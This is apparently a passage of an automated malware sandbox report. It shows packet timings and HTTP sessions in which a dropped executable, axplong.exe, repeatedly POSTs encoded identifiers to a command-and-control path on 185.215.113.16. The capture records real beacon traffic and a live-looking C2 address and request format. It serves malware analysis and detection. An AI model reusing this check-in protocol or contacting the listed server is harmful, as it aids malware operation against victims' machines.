                    Sep 27, 2024 01:43:52.249130964 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.253449917 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.254076004 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.258841038 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.477385044 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.479878902 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.914470911 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.914868116 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.919747114 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.919780016 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.919826031 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.919850111 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.923703909 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.928610086 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.636210918 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.636363029 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.637239933 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.642019987 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.869591951 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.869756937 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.984966993 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.985284090 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.990186930 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.990314960 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.990462065 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.992795944 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.992856979 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.995269060 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.714360952 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.714441061 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:54.715310097 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:54.720134974 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.938955069 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.939120054 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.045618057 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.045945883 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.050976038 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.050992966 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.051044941 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.051101923 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.051268101 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.056498051 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.742865086 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.742985964 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.783298969 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.788110971 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.004493952 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.004606962 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.107924938 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.108293056 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.113177061 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.113249063 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.113327980 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.113377094 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.113441944 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.118184090 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.828773022 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:56.828973055 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.829586029 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:56.834412098 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.061820030 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.061988115 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.170686007 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.171032906 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.175795078 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.175838947 CEST8049759185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.175910950 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.175944090 CEST4975980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.176048040 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.180800915 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.868886948 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:57.868953943 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.869610071 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:57.874417067 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:58.091711998 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:58.091965914 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.279361010 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.279741049 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.284553051 CEST8049760185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:58.284600973 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:58.284670115 CEST4976080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.284714937 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.287947893 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:58.292706966 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.003110886 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.003268003 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.004019022 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.008785009 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.242244005 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.242392063 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.359504938 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.359823942 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.364739895 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.364782095 CEST8049761185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:59.364844084 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.364866972 CEST4976180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.365015984 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:59.369776964 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.055454016 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.055561066 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.056695938 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.061439991 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.281776905 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.281912088 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.390232086 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.391083956 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.395492077 CEST8049762185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.395679951 CEST4976280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.396034956 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:00.396183968 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.396591902 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:00.401384115 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.106066942 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.106142998 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.106846094 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.111692905 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.336932898 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.337044001 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.508198977 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.509303093 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.513891935 CEST8049763185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.513943911 CEST4976380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.515634060 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:01.515706062 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.678165913 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:01.683202982 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.220508099 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.220648050 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.221329927 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.226098061 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.446058035 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.446129084 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.561069012 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.561449051 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.566231966 CEST8049764185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.566303968 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:02.566397905 CEST4976480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.566498041 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.566796064 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:02.571537971 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.281410933 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.284611940 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.286047935 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.290816069 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.529601097 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.529702902 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.641933918 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.642812014 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.647393942 CEST8049765185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.648036957 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:03.648144007 CEST4976580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.648219109 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.648351908 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:03.653393984 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.366070032 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.366226912 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.376144886 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.381139040 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.608016968 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.608079910 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.779014111 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.779640913 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.784189939 CEST8049766185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.784310102 CEST4976680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.784681082 CEST8049767185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:04.784756899 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.785007954 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:04.790008068 CEST8049767185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:05.474082947 CEST8049767185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:05.474159002 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.477329969 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.477832079 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.482434034 CEST8049767185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:05.482497931 CEST4976780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.482628107 CEST8049768185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:05.482690096 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.483377934 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:05.488142967 CEST8049768185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:06.196568012 CEST8049768185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:06.196665049 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.312663078 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.313050985 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.317933083 CEST8049768185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:06.318006039 CEST4976880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.318042040 CEST8049769185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:06.318170071 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.318288088 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:06.323050022 CEST8049769185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.031286001 CEST8049769185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.031419992 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.034090042 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.034404039 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.039307117 CEST8049769185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.039362907 CEST8049770185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.039402008 CEST4976980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.039458990 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.039694071 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.044414043 CEST8049770185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.761219025 CEST8049770185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.761300087 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.878525019 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.879117012 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.883711100 CEST8049770185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.883764029 CEST4977080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.883918047 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:07.883980036 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.887510061 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:07.892298937 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.593796015 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.593858004 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.601042032 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.605962992 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.835089922 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.835433006 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.961332083 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.961993933 CEST4977280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.966667891 CEST8049771185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.966912031 CEST8049772185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.966960907 CEST4977180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.968555927 CEST4977280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.973423004 CEST4977280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:08.978395939 CEST8049772185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:08.978739023 CEST4977280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.118952036 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.123917103 CEST8049773185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:09.124109983 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.124342918 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.129384995 CEST8049773185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:09.849025011 CEST8049773185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:09.849458933 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.960478067 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.960983992 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.965715885 CEST8049773185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:09.965811968 CEST4977380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.965862989 CEST8049774185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:09.965960026 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.966330051 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:09.971194983 CEST8049774185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:10.665312052 CEST8049774185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:10.665493011 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.668296099 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.668452024 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.673295975 CEST8049775185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:10.673396111 CEST8049774185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:10.673418999 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.673729897 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.674395084 CEST4977480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:10.678577900 CEST8049775185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:11.388468981 CEST8049775185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:11.388783932 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.564789057 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.565910101 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.570936918 CEST8049775185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:11.570997953 CEST4977580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.571027994 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:11.571228981 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.571511030 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:11.576359987 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.273880959 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.276469946 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.279227018 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.284197092 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.503853083 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.504693031 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.609833002 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.610282898 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.615222931 CEST8049777185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.615526915 CEST8049776185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:12.615616083 CEST4977680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.615628958 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.615863085 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:12.620667934 CEST8049777185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:13.347182989 CEST8049777185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:13.347263098 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.350346088 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.350666046 CEST4977880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.355595112 CEST8049777185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:13.355679035 CEST4977780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.355766058 CEST8049778185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:13.355825901 CEST4977880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.356055021 CEST4977880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:44:13.361105919 CEST8049778185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:14.054225922 CEST8049778185.215.113.16192.168.2.8
                    Sep 27, 2024 01:44:14.054336071 CEST4977880192.168.2.8185.215.113.16

                    HTTP Request Dependency Graph

                    • 185.215.113.16

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.849710185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:03.610220909 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:04.327598095 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:04.384794950 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:04.615184069 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.849711185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:04.787873030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:05.448733091 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:05.449692011 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:05.676136971 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.849712185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:05.791894913 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
